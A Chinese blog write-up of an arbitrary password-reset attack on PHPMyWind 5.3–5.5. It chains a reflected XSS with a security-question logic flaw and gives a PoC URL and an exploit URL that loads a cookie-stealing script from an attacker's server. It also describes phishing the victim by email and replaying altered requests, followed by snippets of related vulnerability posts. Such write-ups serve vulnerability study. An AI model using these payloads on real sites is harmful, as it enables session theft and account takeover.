XSS漏洞利用---PHPMyWind 任意密码重置漏洞

最新推荐文章于 2025-06-03 17:00:31 发布
原创 最新推荐文章于 2025-06-03 17:00:31 发布 · 2.9k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文揭示了PHPMyWind 5.3-5.5版本中存在的任意密码重置漏洞,详细介绍了攻击者如何利用反射型XSS漏洞与逻辑漏洞组合攻击,实现密码重置的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【漏洞详情】

1、PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3-5.5版本。该“任意密码重置漏洞”联合利用了“反射型XSS漏洞”与“逻辑漏洞”。攻击者可以利用该“反射型XSS漏洞”,通过诱使受害者点击恶意链接,窃取受害者的Cookie;接着,攻击者可以利用Cookie伪造受害者身份,利用该“逻辑漏洞”,在不知道“受害者密码”的前提下,修改“受害者的密保问题”,进而达到重置受害者密码的目的。攻击思路如下:

【漏洞利用】

1、在网站注册2个测试账号(攻击者、受害者)。
使用PHPMyWind的注册功能注册攻击者的账号hacker以及受害者的账号testtest,通过PHPMyWind的管理后台可以发现hacker的ID为3,而受害者的ID为2,如图所示。

2、攻击者和受害者都登录网站的会员中心;攻击者hacker的登录效果如图3所示。

3、受害者victim的登录效果如图4所示。

4、攻击者使用BurpSuite抓取“重置账号密码”的数据包;
抓取的结果如图所示,可以发现网页表单里的“提问:驾驶执照最后四位数字?”对应着报文中的“question=7”,而“回答:123”对应着报文中的“answer=123”。

5、攻击者向受害者的邮箱发送可触发反射型XSS漏洞的超链接的邮件(该反射型XSS漏洞可致受害者Cookie泄露)。
网站具有反射型XSS注入漏洞的的PoC如下:http://IP/data/api/oauth/connect.php?method=unknownmethod%3Cscript%3Ealert(1)%3C/script%3E
该PoC的执行效果如图所示。

6、修改PoC为如下EXP:http://IP/data/api/oauth/connect.php?method=unknownmethod<script src=http://所搭建的盗取cookie的PHP网站IP/ReflectiveXSS.js></script>

7、攻击者hacker将该恶意链接发送给受害者,诱骗受害者进行点击,如可利用该EXP编辑恶意的电子邮件(邮件正文的“Please Click the Link”的超链接指向了该EXP),并将之发送给受害者。如下图所示受害者点击链接后将会在不知情的情况下受到恶意JS脚本的攻击,自身在PHPMyWind网站的Cookie也会被泄露给攻击者(受害者的Cookie将被传输给攻击者搭建的我们搭建的盗取cookie的PHP网站上)。

 

8、攻击者在获得受害者Cookie后,修改步骤5的“重置账号密码”的数据包,并向网站发送数据包,以期重置受害者的“密码找回答案和密码”。
接下来,攻击者safedog对BurpSuite的数据包进行修改。在BurpSuite的Repeater面板下进行如下操作:

9、改包发包之后返回结果如图所示攻击者hacker成功重置了受害者testtest的“密码找回问题及答案”。

10、攻击者利用网站的“密码找回”功能,重置受害者的登录密码,进而实现非法登录系统。攻击者访问网站的“会员中心/登录页面/找回密码”页面,以针对受害者的账号进行“找回密码”操作,如图所示。

11、选择“安全问题”为“你最喜欢的餐馆名称”,填写“问题答案”为“hacker”,并点击“找回密码”按钮,如图所示(“安全问题”以及“问题答案”与上一步中数据包中的问题以及答案相对应)。

11、此时,我们可以发现,可以通过“回答安全问题找回密码”的功能重置受害者testtest的密码,如图所示。

12、接着,攻击者safedog可以利用为受害者victim重置的密码登录网站,如图所示。

【总结】

该重置任意用户密码的漏洞是XSS漏洞与逻辑漏洞结合利用实现的,该网站存在XSS漏洞可盗取用户cookie修改密保问题,利用逻辑漏洞修改密保问题,通过密保问题修改用户密码。

XSS漏洞利用---存储型XSS钓鱼
Ethan024的博客
03-13 1310
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备 pikachu平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路(使用basic认证做钓鱼) 制作钓鱼鱼儿:WWW Authenticate:Basic 即:在存在XSS漏洞的页面上嵌入请求(JavaScript或其他链接)。当用户点击打开嵌入恶意代码页面的时候,该页面会向后台发送请求,该请求会要求用户返回basic认证。因此在用户界面就会弹出
holdpwd php,PHPMyWind后台管理界面的SQL注入漏洞 - 网站安全
weixin_35757191的博客
04-10 654
后台管理界面因为过滤不严格导致SQL注入漏洞,可以使权限较低的管理员取得较高权限,以及获取并修改超级管理员的用户名密码。存在问题的代码,admin_save.php 59-101行,SQL语句中的$id存在注入else if($action == 'update'){//创始人账号不允许更改状态if($id == 1 and ($checkadmin != 'true' or $levelname...
[【原创】] phpmywind多个鸡肋漏洞1
08-08
>$keyword 木有进行过滤 导致注入 直接访问 木有找到GetPage函数导致出错 注入变成鸡肋下载 (19.21 KB)2012-8-24 13:40后
XSS的高级利用(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Libra1313的博客
06-03 651
想象一下,未经任何安全考量的用户输入,像脱缰的野马一样,直接冲向了公共页面。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。字段,每一个访问页面的用户都成了潜在的受害者,浏览器沦为恶意代码的游乐场。最终,白帽小哥凭借敏锐的洞察力,赢得了800美元的赏金。个人吐槽:这段代码简直是教科书级别的窃密流程,如果我是黑客,我可能会加个延时函数,让整个过程更隐蔽。接下来,让我们看看精心构造的Payload,是如何将XSS的危害提升到新的高度的。的事情了,而工作绕不开的就是。
PhpMyWind 储存型 XSS 漏洞(CVE-2017-12984)
CuiXY's Blog
01-20 451
0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞。如下图所示,这个就是发生储存型XSS漏洞的代码 0x02 演示 1.第一张图是客户留言时,对留言的内容进行htmlspecialchars函数过滤。第二张图是管理员在修改留言信息时并未对显示的内容进行过滤,所以导致了XSS攻击 2.首先进入客户留言板块,在内容处构造我们的POC,验证X...
[代码审计]:PhpMyWind储存型XSS漏洞(CVE-2017-12984)
笑花大王
02-11 708
简介 今天开启一下代码审计的篇章 python安全编程剩下的看起来没意思就结束了 ,现在规划每2周写一个爬虫练练手, 然后今天开启代码审计和Docker的学习 我个人感觉先看漏洞利用过程再看漏洞分析比较好点 phpmywind 5.3 漏洞影响版本:phpMyWind version <= 5.4 测试版本:phpMyWind 5.3 下载地址:链接:https://pan.b...
SCANV团队提醒警惕phpMyWind漏洞“三弹连发”
u013102998的专栏
01-15 1077
继1月3日预警的"phpMyWind高危SQL注入漏洞"及1月7日发布的"phpMyWind再爆高危SQL注入漏洞",0day5网站上再次曝光了一个phpMyWind的高危SQL注入漏洞。该漏洞同1月3日预警漏洞一样存在于shoppingcart.php文件里,影响到官方新版本(v4.6.6 Beta)及1月3日我们发布漏洞补丁(shoppingcart.php文件)。由于这三个漏洞官方暂时都没有
httpmember.php,PHPMyWind 5.1 /member.php 远程密码修改漏洞
weixin_31283549的博客
03-12 697
/member.php//初始化参数……$id = isset($id) ? intval($id) : 0;……//更新资料else if($a == 'saveedit'){//检测数据完整性if($password!=$repassword or $email==''){header('location:?c=edit');exit();}//HTML转义变量....//检测旧密码是否正确i...
xss-labs-xss漏洞
10-31
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到其他用户的浏览器中。攻击者利用XSS漏洞可以执行各种恶意操作,如窃取用户信息、劫持会话、欺骗用户点击恶意链接...
xss-labs-master.rar
05-09
"XSS-labs-master"提供了丰富的实战场景,每个关卡设计了不同的XSS攻击方式,玩家需找出并利用漏洞,实现目标。通过解谜式的学习,可以锻炼寻找、构造和利用XSS的能力。在实践中,你可以学习到如何发现潜在的注入点...
phpmywind模板
01-18
phpmywind模板
PHPMyWind_5.6.zip
08-15
PHPMyWind 是一款基于PHP+MySQL开发,符合W3C标准的建站引擎。 PHPMyWind 是一款基于PHP+MySQL开发,符合W3C标准的建站引擎。适用于企业级建站的首选利器。开发之初,团队就从适用于企业级建站为突破口,增强程序的易用性,灵活性,可拆分性,致力于为国内企业网站提供"核动力"。
PHPMyWind CMS官方版 v4.6.5 Beta
04-02
PHPMyWind CMS官方版 v4.6.5 Beta,是目前该系统网站的最新版本,PHPMyWind是一个品牌,一款基于PHP+MySQL开发符合W3C标准的建站引擎。它将带给人们一系列高效的,成熟的企业网站建设解决方案,让您的信息以更健康的形式高速传递给需要的它的人们,同时让您感受通过PHPMyWind带给您畅快体验。 设计理念 我们追求速度与舒适度。PHPMyWind要做的,只是贴近再贴近中国建站行业人员的使用习惯。在我们的眼中,PHPMyWind不止是一款CMS。它是一套底层代码,是工具箱,是万花筒。我们工作中的任何项目都可以通过改动它来完成。前提是我们都具备PHP的开发基础。我们会尽一切努力把代码与结构制作的简单易懂。你需要什么,尽管来拿! 开发语录 PHPMyWind 前台与后台完全采用PHP代码开发完成,测试过使用框架或模板引擎,虽然MVC很理想,可是却增加了二次开发的难度,特别影响速度。PHPMyWind 主要面向的开发者就是企业建站行业的童鞋们。我们需要的是简单的,快速的,稳定的,拆分性较强的CMS。可能每个站只有几个栏目,亦或网站功能较为特殊需要定制。所以,对模块化要求极强。因此,我们总结上述几点是企业建站开发者们最需要的几点需求,以此为突破口,开发过程中时刻遵循于此。我们希望,开发者在开发的过程中感觉快速、舒适,这是我们的追求。 PHPMyWind 从2010年开发至今已有2年时间,其间已经过4次重写。结构,代码写法逐步成熟。系统内置多个类以及函数,大幅提升开发速度。如目前对系统类使用不惯得同学们,也可以采用PHP内置原生函数开发。每个前台页面保证在头部调用 /include/config.inc.php 即可初始化系统代码,进行开发工作。前台只作为示例展示,与后台关联程度不高,但也可直接使用。目前您可视PHPMyWind为一款CMS核心,在它之上制作丰富的网站。 PHPMyWind v4.6.5 Beta 更新时间:2013-08-28 更新说明: 【更新】 1.新增管理组与权限管理 2.全新设计后台登陆界面 3.更新后台界面样式 【优化】 1.优化对创建超级管理员的权限判断 2.优化类别折叠效果 【修复】 1.修复部分环境下多站切换无效问题 2.修复快捷导航浏览器兼容性的问题 3.修复导航缩略图片只显示路径问题 4.修复关闭文章评论后收藏失效问题 5.修复自定义菜单项添加报错问题 6.修复新增变量为空时不报错问题 7.修复分页页码为负数报错问题 8.修复编辑器过滤HTML标记问题 9.修复管理员问题回答错误问题 10.修复快捷导航链接错误问题 11.修复编辑器v4.1.7多图路径问题
phpmywind调用方法
08-20
这是有关phpmywind调用的方法。。个人觉的很不错。。拿出来分享一下
phpmywind表结构.pdf
08-03
phpmywind表结构.pdf
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master`很可能包含一系列逐步增加难度的关卡,每个关卡可能模拟真实世界中的XSS漏洞场景。玩家需要找出并利用这些漏洞,提交正确的payload(注入的脚本)以过关。这样的练习可以帮助测试人员理解XSS攻击的...
php+sha512+漏洞,PhpMyWind最新版本注入+后台getshell
weixin_35338620的博客
03-25 1267
转自http://wooyun.org/bugs/wooyun-2010-051256洞主文中没说清楚,厂商也忽略了。简要分析如下漏洞出在/order.php中[php]function GetTopType($tbname='', $tbname2='', $colname='', $id=0, $i=0){global $dosql;if(isset($_GET['id'])){$r = $d...
PhpMyWind储存型XSS漏洞练习(CVE-2017-12984)
墨鱼菜鸡
01-20 204
0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞。如下图所示,这个就是发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值